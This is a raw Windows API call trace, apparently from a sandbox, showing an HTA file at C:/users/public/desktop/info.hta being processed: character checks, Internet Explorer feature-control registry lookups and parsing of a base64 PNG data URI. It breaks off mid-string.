0 [0227.887] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.887] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x31) returned 1 [0227.887] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x2e) returned 0 [0227.887] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x18) returned 0x585880 [0227.887] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x50) returned 0x57a4e0 [0227.887] IsCharAlphaNumericW (ch=0x20) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x7b) returned 0 [0227.887] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.888] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x30) returned 1 [0227.888] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3a) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x3b) returned 0 [0227.888] IsCharAlphaNumericW (ch=0x7d) returned 0 [0227.889] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", ppu=0x14d180 | out: ppu=0x14d180) returned 0x0 [0227.889] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14d11c | out: phkResult=0x14d11c*=0x274) returned 0x0 [0227.889] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14d120 | out: phkResult=0x14d120*=0x278) returned 0x0 [0227.889] RegOpenKeyExW (in: hKey=0x278, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x14d0dc | out: phkResult=0x14d0dc*=0x0) returned 0x2 [0227.889] RegOpenKeyExW (in: hKey=0x274, lpSubKey="FEATURE_SCRIPTURL_MITIGATION", ulOptions=0x0, samDesired=0x1, phkResult=0x14d0dc | out: phkResult=0x14d0dc*=0x0) returned 0x2 [0227.889] RegCloseKey (hKey=0x0) returned 0x6 [0227.889] RegCloseKey (hKey=0x0) returned 0x6 [0227.889] RegCloseKey (hKey=0x274) returned 0x0 [0227.889] RegCloseKey (hKey=0x278) returned 0x0 [0227.889] CreateUri (in: pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14d180 | out: ppURI=0x14d180*=0x53d8ec) returned 0x0 [0227.890] ParseURLW (in: pcszURL="file:///C:/users/public/desktop/info.hta", ppu=0x14d010 | out: ppu=0x14d010) returned 0x0 [0227.890] CreateUri (in: pwzURI="file:///C:/users/public/desktop/info.hta", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14d0cc | out: ppURI=0x14d0cc*=0x53c4ac) returned 0x0 [0227.890] IUnknown:QueryInterface (in: This=0x53c4ac, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14d094 | out: ppvObject=0x14d094*=0x53c4ac) returned 0x0 [0227.890] IUnknown:Release (This=0x53c4ac) returned 0xd [0227.890] IUnknown:AddRef (This=0x53c4ac) returned 0xe [0227.890] CoInternetCombineIUri (in: pBaseUri=0x53c4ac, pRelativeUri=0x53d8ec, dwCombineFlags=0x6000000, ppCombinedUri=0x14d100, dwReserved=0x0 | out: ppCombinedUri=0x14d100*=0x53d8ec) returned 0x0 [0227.890] IUnknown:Release (This=0x53c4ac) returned 0xd [0227.890] IUnknown:Release (This=0x53c4ac) returned 0xc [0227.890] IUnknown:QueryInterface (in: This=0x53d8ec, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14d054 | out: ppvObject=0x14d054*=0x53d8ec) returned 0x0 [0227.890] IUnknown:Release (This=0x53d8ec) returned 0x3 [0227.890] IUnknown:AddRef (This=0x53d8ec) returned 0x4 [0227.890] IUri:GetAbsoluteUri (in: This=0x53d8ec, pbstrAbsoluteUri=0x14d048 | out: pbstrAbsoluteUri=0x14d048*="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=") returned 0x0 [0227.890] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0xf4) returned 0x574878 [0227.891] IUnknown:AddRef (This=0x53d8ec) returned 0x5 [0227.891] IUnknown:QueryInterface (in: This=0x53d8ec, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14d01c | out: ppvObject=0x14d01c*=0x53d8ec) returned 0x0 [0227.891] IUnknown:Release (This=0x53d8ec) returned 0x5 [0227.891] IUnknown:AddRef (This=0x53d8ec) returned 0x6 [0227.891] IUri:GetScheme (in: This=0x53d8ec, pdwScheme=0x14d068 | out: pdwScheme=0x14d068*=0x0) returned 0x0 [0227.891] IUnknown:Release (This=0x53d8ec) returned 0x5 [0227.891] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x4c) returned 0x57a538 [0227.891] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x48) returned 0x5549a0 [0227.891] IInternetSecurityManager:MapUrlToZone (in: This=0x542e68, pwszUrl="file:///C:/users/public/desktop/info.hta", pdwZone=0x14d060, dwFlags=0x0 | out: pdwZone=0x14d060*=0x0) returned 0x0 [0227.891] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x1b0) returned 0x58b2f8 [0227.891] IUnknown:QueryInterface (in: This=0x53d8ec, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14cd5c | out: ppvObject=0x14cd5c*=0x53d8ec) returned 0x0 [0227.891] IUnknown:Release (This=0x53d8ec) returned 0x5 [0227.891] IUnknown:AddRef (This=0x53d8ec) returned 0x6 [0227.891] ParseURLW (in: pcszURL="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", ppu=0x14cd20 | out: ppu=0x14cd20) returned 0x0 [0227.891] HeapFree (in: hHeap=0x510000, dwFlags=0x0, lpMem=0x0 | out: hHeap=0x510000) returned 1 [0227.891] IUnknown:AddRef (This=0x53d8ec) returned 0x7 [0227.891] IUnknown:AddRef (This=0x53d8ec) returned 0x8 [0227.891] IUnknown:QueryInterface (in: This=0x53d8ec, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14cd50 | out: ppvObject=0x14cd50*=0x53d8ec) returned 0x0 [0227.892] IUnknown:Release (This=0x53d8ec) returned 0x8 [0227.892] IUnknown:AddRef (This=0x53d8ec) returned 0x9 [0227.892] IUri:GetScheme (in: This=0x53d8ec, pdwScheme=0x58b400 | out: pdwScheme=0x58b400*=0x0) returned 0x0 [0227.892] IUri:GetSchemeName (in: This=0x53d8ec, pbstrSchemeName=0x14cd50 | out: pbstrSchemeName=0x14cd50*="data") returned 0x0 [0227.892] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0227.892] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ccd0 | out: phkResult=0x14ccd0*=0x278) returned 0x0 [0227.892] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14ccd4 | out: phkResult=0x14ccd4*=0x274) returned 0x0 [0227.892] RegOpenKeyExW (in: hKey=0x274, lpSubKey="FEATURE_DATAURI", ulOptions=0x0, samDesired=0x1, phkResult=0x14cc90 | out: phkResult=0x14cc90*=0x0) returned 0x2 [0227.892] RegOpenKeyExW (in: hKey=0x278, lpSubKey="FEATURE_DATAURI", ulOptions=0x0, samDesired=0x1, phkResult=0x14cc90 | out: phkResult=0x14cc90*=0x0) returned 0x2 [0227.892] RegCloseKey (hKey=0x0) returned 0x6 [0227.892] RegCloseKey (hKey=0x0) returned 0x6 [0227.892] RegCloseKey (hKey=0x278) returned 0x0 [0227.892] RegCloseKey (hKey=0x274) returned 0x0 [0227.892] IUnknown:QueryInterface (in: This=0x53d8ec, riid=0x740fd6e8*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14cd5c | out: ppvObject=0x14cd5c*=0x53d8ec) returned 0x0 [0227.893] IUnknown:Release (This=0x53d8ec) returned 0x9 [0227.893] IUnknown:AddRef (This=0x53d8ec) returned 0xa [0227.893] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x8, Size=0x10) returned 0x57d548 [0227.893] RtlAllocateHeap (HeapHandle=0x510000, Flags=0x0, Size=0x1bc) returned 0x58b4b0 [0227.893] CreateUri (in: pwzURI="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=", dwFlags=0x2b80, dwReserved=0x0, ppURI=0x14cccc | out: ppURI=0x14cccc*=0x53d8ec) returned 0x0 [0227.893] IUri:GetSchemeName (in: This=0x53d8ec, pbstrSchemeName=0x14ccac | out: pbstrSchemeName=0x14ccac*="data") returned 0x0 [0227.893] _wcsnicmp (_String1="data", _String2="data", _MaxCount=0x5) returned 0 [0227.893] IUri:GetPathAndQuery (in: This=0x53d8ec, pbstrPathAndQuery=0x14ccd8 | out: pbstrPathAndQuery=0x14ccd8*="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9ACrCWotS8xnQWQCHOGsafzOFOhzLT8NxmoI3RZncULjG1ARA8DHYupxUucbUtxd4ghnw4JI30wdARHneMABx0j8FYD3xCkdefQByKFl9KsOjy6nKNBR0cZRCTjOk1JhrBCCY5r3pZtSS9bZkueSqmljVgPoPDa0Algk4HD8QG8AXph0G8Dk2AC89DgPosFKodvR83G/dtiRzTevtUChP0SCTpBQuM+bI6Bvk51gl96X/FFvzCh9oW0v+H2zO2tYtz/EgAAAAJXRFWHRkYXRlOmNyZWF0ZQAyMDE5LTAzLTEyVDEyOjM5OjA0KzAwOjAwG6lIYwAAACV0RVh0ZGF0ZTptb2RpZnkAMjAxOS0wMy0xMlQxMjozOTowNCswMDowMGr08N8AAAAASUVORK5CYII=") returned 0x0 [0227.893] IUnknown:Release (This=0x53d8ec) returned 0xa [0227.893] SysStringLen (param_1="image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAEAAAABACAQAAAAAYLlVAAAABGdBTUEAALGPC/xhBQAAACBjSFJNAAB6JQAAgIMAAPn/AACA6QAAdTAAAOpgAAA6mAAAF2+SX8VGAAAAAmJLR0QA/4ePzL8AAAAJcEhZcwAACxMAAAsTAQCanBgAAAAHdElNRQfjAwwMJwSFwIn8AAADNklEQVRo3u2ZTUhUURTHfzozmprmZ1pYEmkfJNEmiwwkSEyFECIQpEUboYhqFYHQXlcti9rUKldWBEUiuQpbtDDNzD5G8qM0HRXLRtO5LdJx3puPd++8+xyIztm88zgf/3veufeee18SdimDI1RxnL0U4gbAzxhDdPGCfpZs+49JWTTyFB8iAq8wTju1pDgXvopOliIGX+d57rHPieBuLvLNIvgaD1KvP/x1FiTDCwQTNOkFcJVfCuEFgq+c0he+minF8AJBH2WRnCUph8/nIZVhb2d5w1smEbjYSTn7SQ/TucsFlnWkPxBW6Xc4RkbIoHKooSNshsxRbT98Eb0mtyM04oqgmR6hUNvtrwrnWDa4nOVMVF0XLfw2aPuosBfezQPTmNpiVtFmnpj0W+wBKMFrcPeJ3RYWNfwwWHSSZgdAHX6Du5uWFpl0myqm1KiQrASgnNQQaZFOS4t5nhvkAnbZAbDHIE0wIGHzmsUQKdXkQwlACtsN8ijfJay8zBjkovgBbCLPlAG/hNUcswa5IH4Ayasdzxr5pBbWRRYMstGHYg04QAkH4FbQFSwTCKbdI7mzWVipbMceKtiCCFqO0OeY1caRbAaKOcgOCpQ+WWTyM8EwvfjkTfJoYZDFONqwaPyTHs7LbktlPNMYep2XuE22dfhsHjkS/i+3Wn/SK2EdoE72UeuyGH8rxbbLLjqlkRlb4TAzDo5fIJiOvRTnR+ju9VJuwveC/wASDsD+2h5KUyyQTVZiALzjFt3MsY16mtmqx2mt9BbUw4EQuzpGpVcCLQB8nDBZXmJFDoCeInzFS9ObxwzLmeoBMGA4/QBM4t1IAOHXDi7Zqwg9AC